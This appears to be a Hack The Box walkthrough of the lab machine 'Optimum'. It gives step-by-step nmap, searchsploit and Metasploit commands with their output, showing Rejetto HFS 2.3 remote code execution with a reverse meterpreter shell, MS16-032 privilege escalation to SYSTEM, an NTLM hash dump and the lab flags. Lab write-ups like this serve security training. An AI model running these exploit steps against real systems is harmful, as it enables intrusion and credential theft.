You are here: Home Articles VM - Optimum

VM - Optimum

Details
Category: Articles
Hits: 787

A walkthrough of HackThe Box VM "Optimum"

 A quick NMAP

└─# nmap -A -T4 -p- 10.129.61.255

Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), 
Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), 
Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), 
Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), 
Microsoft Windows 7 or Windows Server 2008 R2 (85%), 
Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1(85%), 
Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)

So, what do we have here ?

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Let's ask Google, exploit-db and searchsploit for info. Let's start with searchsploit

searchsploit HttpFileServer
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                
┌──(nx㉿xeon)-[~]
└─$ searchsploit rejetto       
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) - Remote Comma | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Mult | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbi | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c | windows/webapps/34852.txt
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results

There's a couple of suggestions in searchsploit, let's try Metasploit.

msf6 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 >

What about exploit-db ?

https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/49125

 So, we know we're running some kind of Windows, likely a server 2012 version and it's running some kind of fileserver app. We also know there's exploits for the service, both source, and metasploit modules, so let's be lazy and go for MSF.

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                         addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Let's set the options, and try to run the attack.

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.129.61.255
rhosts => 10.129.61.255
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.33
lhost => 10.10.14.33
msf6 exploit(windows/http/rejetto_hfs_exec) > run

It should give back a connection, and drop you into a meterpreter shell, if that was your payload.

meterpreter > getuid
Server username: OPTIMUM\kostas

Server username: OPTIMUM\kostas

meterpreter > background
[*] Backgrounding session 1...

So, we have a shell, running as the kostas user. That's not enough, we need system, so how do we do that. We could run a post module, named suggester to find local exploits.

msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.61.255 - Collecting local exploits for x86/windows...

So, we let the module do it's work, and try to collect a list of local exploits for us. When it's done, we have a few options. I list them here, because some of them will fail, so just run down the list, and see what happens, one of them might work, so patience :)

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 10.10.14.33:4444 
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) >

So, bypassuac_eventvwr failed. Let's try one more.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.13        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.33:4444 
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\eAzNqoy.ps1...
[*] Compressing script contents...
[+] Compressed size: 3596
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2612

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2564
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

GCYHIeZ6ABRvgsxgU7Vr4QXKJJZqtCjp
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.129.61.255
[*] Meterpreter session 2 opened (10.10.14.33:4444 -> 10.129.61.255:49164) at 2021-04-27 01:32:43 +0200
[+] Deleted C:\Users\kostas\AppData\Local\Temp\eAzNqoy.ps1

So, it worked, and we get a meterpreter shell back.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : OPTIMUM
SysKey : 26abbd282f97155f44e222de59a95a7e
Local SID : S-1-5-21-605891470-2991919448-81205106

SAMKey : 17524c894cca9813298b81f79204ca4f

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: d90b270062e8b9f118ab8e0f733df391

RID  : 000001f5 (501)
User : Guest

RID  : 000003e9 (1001)
User : kostas
  Hash NTLM: fb7c6aab6468ef0383f97a12b78ab8ac

Let's pause here for a moment. What if we can't run the local exploit suggester module, if we aren't in metasploit ? There's something called windows-exploit-suggester, https://github.com/AonCyberLabs/Windows-Exploit-Suggester.

Simply download and install it, run the sysinfo command on a windows system, and copy that into a file on your linux host, and run windows-exploit-suggester, to get an idea of what attack vectors are possible.
But we didn't need it here, let's go hunt some flags...

meterpreter > cat user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

 Directory of c:\Users\Administrator\Desktop

18/03/2017  03:14     <DIR>          .
18/03/2017  03:14     <DIR>          ..
18/03/2017  03:14                 32 root.txt
               1 File(s)          32 bytes
               2 Dir(s)  31.895.547.904 bytes free

c:\Users\Administrator\Desktop>type root.txt    
type root.txt
51ed1b36553c8461f4552c2e92b3eeed
c:\Users\Administrator\Desktop>

So, we're done ;)

You have no rights to post comments